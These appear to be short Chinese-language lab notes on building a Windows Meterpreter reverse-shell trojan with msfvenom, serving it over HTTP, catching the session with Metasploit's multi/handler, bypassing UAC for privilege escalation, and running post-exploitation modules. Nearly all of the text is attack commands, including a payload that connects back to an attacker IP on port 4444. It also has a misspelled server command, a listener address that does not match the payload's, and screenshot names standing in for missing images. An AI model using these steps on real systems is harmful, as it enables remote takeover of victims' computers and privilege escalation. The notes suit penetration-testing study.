反弹连接木马获取shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 -f exe >2020shell.exe

python -m SimpleHTTPSevrver 8080

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options

set LHOST 192.168.56.102

UAC(用户账户控制)

​ 要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前,提供权限或管 理员密码

UAC绕过提权

​ Exploit/windows/local/ask

image-20200916163119745.png

Run post/windows/gather/forensics/enum_drives //获取目标机器的分区情况

Run post/windows/gather/checkvm //判断是否为虚拟机

Run Scraper //脚本

Run Winenum //脚本

image-20200916164702625.png))

image-20200916165649850.png

image-20200916170242029.png

image-20200916170453325.png